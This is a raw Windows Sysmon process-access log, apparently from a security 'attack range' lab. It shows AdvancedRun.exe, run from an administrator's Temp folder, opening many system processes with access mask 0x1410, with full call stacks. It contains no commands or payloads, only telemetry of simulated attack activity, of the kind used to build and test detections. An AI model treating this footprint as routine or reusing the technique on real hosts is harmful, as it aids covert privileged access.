10341000x80000000000000004063650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.912{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.910{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.910{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.909{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.909{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.908{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.908{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004063633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
